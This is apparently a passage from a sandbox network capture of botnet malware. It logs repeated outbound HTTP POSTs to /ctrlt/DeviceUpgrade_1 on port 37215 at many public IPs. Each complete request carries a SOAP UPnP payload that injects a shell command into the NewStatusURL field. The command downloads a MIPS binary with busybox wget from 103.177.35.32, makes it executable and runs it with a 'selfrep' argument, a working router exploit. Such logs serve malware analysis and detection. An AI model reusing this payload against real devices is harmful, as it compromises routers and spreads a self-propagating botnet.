                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1116192.168.2.2357408197.2.128.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528215885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1117192.168.2.2333290157.209.36.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528233051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1118192.168.2.2336062157.26.27.22837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528234005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1119192.168.2.2340396157.61.1.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528251886 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1120192.168.2.234488041.120.59.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528268099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1121192.168.2.233702041.60.109.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528275967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1122192.168.2.234842441.11.129.037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528315067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1123192.168.2.234739641.73.198.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528844118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1124192.168.2.2358078157.32.87.3637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528862000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1125192.168.2.235236241.105.188.23037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528865099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
